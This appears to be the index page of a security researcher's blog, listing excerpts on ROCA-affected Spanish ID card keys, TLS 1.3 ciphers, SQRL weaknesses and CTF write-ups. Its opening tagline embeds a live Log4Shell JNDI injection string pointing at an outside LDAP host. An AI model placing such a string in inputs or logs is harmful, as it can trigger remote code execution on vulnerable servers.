Be ${jndi:ldap://klondike.es/k} my friends!
On the real security of 1920-bit keys
In February 2017 the vulnerability known as Return of Coppersmith's Attack (ROCA), CVE-2017-15361, was reported; among other devices, it affected a large number of electronic DNIs (Spanish national ID cards) with a Gemalto chip. The fix applied in the case of the DNIs was to revoke (prevent any future use of) the affected keys and issue new keys of […]
Some notes on cipher choices and TLS1.3
After some discussion about TLS1.3 and ciphers with a few colleagues, I have decided to write a short summary of "the basics" you need to know as a developer. Here I will also briefly explain which niche each of the 5 ciphers aims for and what the hash function they contain is actually […]
The "secret" behind allowing Christmas dinners during the Coronavirus
There is a big "secret" behind many of the things that have been happening in the world for many years: the decisions that governments and companies make, how the great fortunes decide what to invest in, how the best way to treat a patient is decided, how it is decided what to do to keep a […] from being "hacked"
Euskal Encounter 28 and memories of Campus Party España 16
Anyone who remembers the period between the end of the 15th edition of Campus Party España (#CPES15) and the 16th (#CPES16) will probably know what I am going to talk about, but in 9 years generations have changed a lot, and there are people who have forgotten their past simply because they never lived it. In this […]
What a pitiful world
Today I have decided to destroy Louis Armstrong’s famous “what a wonderful” world with a version that describes more accurately the world in which we live: I see misquotes, fake news too, I see them harm, and go against you, And I think to myself what a pitiful world. I see vague words, lies of […]
Weaponizing squirrels (or why I can't recommend SQRL)
After seeing Steve Gibson's talk about SQRL today it just occurred to me how easy it would be to weaponize SQRL to effectively attain permanency on systems. Below I'll present a few attack scenarios that can give an idea of some of the vulnerabilities of the system that make me uncomfortable.
Security Fest CTF *-bit challenges, organizer writeup
I wrote the 128-bit, 512-bit and 1024-bit challenges for the Security Fest CTF; this year's topic was Swordfish, so the challenges follow the idea of the quotes used in the movie regarding 128-bit, 512-bit and 1024-bit ciphers. Sadly, none of the challenges was solved despite my best attempts. In this post I'll explain how […]
Assured MQTT challenge write-up
In this write-up I'll cover my solution to Assured's MQTT challenge; I'll also explain what their intended solution was.
PaF||STFU
If you have been working in the IT security industry, you have probably heard CISOs (Chief Information Security Officers) complain about how companies fail at improving their security, and pentesters complain about how their findings are ignored by companies. Whilst there is clearly no one-size-fits-all solution to such problems, in this post I will […]